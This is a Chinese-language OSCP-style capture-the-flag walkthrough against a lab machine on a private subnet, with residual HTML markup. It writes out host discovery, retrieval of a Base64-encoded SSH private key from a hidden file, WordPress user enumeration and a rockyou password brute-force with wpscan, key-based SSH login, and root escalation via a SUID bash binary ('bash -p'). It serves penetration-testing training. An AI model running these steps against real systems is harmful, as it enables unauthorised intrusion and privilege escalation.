OSCP渗透测试实战教学文档<\/h1>

环境信息<\/h2>

攻击机IP<\/strong>: 192.168.44.128<\/li>

靶机IP<\/strong>: 192.168.44.130<\/li> <\/ul>
信息收集阶段<\/h2>
1. 主机存活发现<\/h3>
使用以下工具确定靶机IP：<\/p>
nmap -sn 192.168.44.0\/24 # 使用ICMP ping扫描整个子网<\/span> <\/span><\/span>arp-scan -I eth0 -l # 使用ARP协议扫描本地网络<\/span> <\/span><\/span><\/code><\/pre>2. 端口扫描<\/h3> 关键发现：<\/p> 存在两条潜在攻击路径：找到SSH账号和密码进行远程连接<\/li> 利用前端Web应用漏洞<\/li> <\/ul> <\/li> <\/ul> 3. 目录扫描<\/h3> 重要发现：<\/p> 检查robots.txt<\/code>文件，发现secret.txt<\/code><\/li> secret.txt<\/code>内容为Base64编码，解码后获得SSH私钥<\/li> 将私钥保存为id_rsa<\/code>文件：<\/li> <\/ul> echo "Base64编码内容"<\/span> | base64 -d > id_rsa <\/span><\/span>chmod 600<\/span> id_rsa # 设置适当权限<\/span> <\/span><\/span><\/code><\/pre>前端Web测试<\/h2> WordPress分析<\/h3> 目标运行WordPress 5.4.2<\/li> 使用wpscan<\/code>工具进行扫描：<\/li> <\/ul> wpscan --url http:\/\/192.168.44.130 --enumerate u # 枚举用户<\/span> <\/span><\/span><\/code><\/pre> 发现唯一用户admin<\/code>，但爆破失败：<\/li> <\/ul> wpscan --url http:\/\/192.168.44.130 -eu -P \/usr\/share\/wordlists\/rockyou.txt <\/span><\/span><\/code><\/pre>关键发现<\/h3> 网站首页包含重要提示：唯一用户为"oscp"<\/li> 使用该用户通过SSH私钥成功登录：<\/li> <\/ul> ssh -i id_rsa oscp@192.168.44.130 <\/span><\/span><\/code><\/pre>权限提升<\/h2> 1. sudo权限检查<\/h3> sudo -l # 需要密码，此路不通<\/span> <\/span><\/span><\/code><\/pre>2. SUID提权<\/h3> 查找具有SUID位的可执行文件：<\/p> find \/ -perm -u=<\/span>s -type f 2>\/dev\/null <\/span><\/span><\/code><\/pre>关键发现：<\/p> \/usr\/bin\/bash<\/code>具有SUID位<\/li> 使用GTFOBins方法提权：<\/li> <\/ul> \/usr\/bin\/bash -p # -p参数保留特权<\/span> <\/span><\/span>whoami # 验证是否为root<\/span> <\/span><\/span><\/code><\/pre>3. 获取flag<\/h3> 进入root目录获取flag完成挑战。<\/p> 关键工具与技术总结<\/h2> 信息收集工具<\/strong>：<\/p> nmap<\/li> arp-scan<\/li> 目录扫描工具（如dirb, dirsearch等）<\/li> <\/ul> <\/li> WordPress测试<\/strong>：<\/p> wpscan<\/li> 用户枚举与密码爆破<\/li> <\/ul> <\/li> 权限提升技术<\/strong>：<\/p> SUID提权<\/li> GTFOBins利用<\/li> <\/ul> <\/li> 其他技术<\/strong>：<\/p> Base64解码<\/li> SSH私钥使用<\/li> <\/ul> <\/li> <\/ol> 学习要点<\/h2> 永远仔细阅读网站内容，关键信息可能隐藏在显眼位置<\/li> 多种工具组合使用可提高成功率<\/li> 当一种攻击路径受阻时，及时尝试其他方法<\/li> 熟悉常见提权技术（如SUID）至关重要<\/li> <\/ol>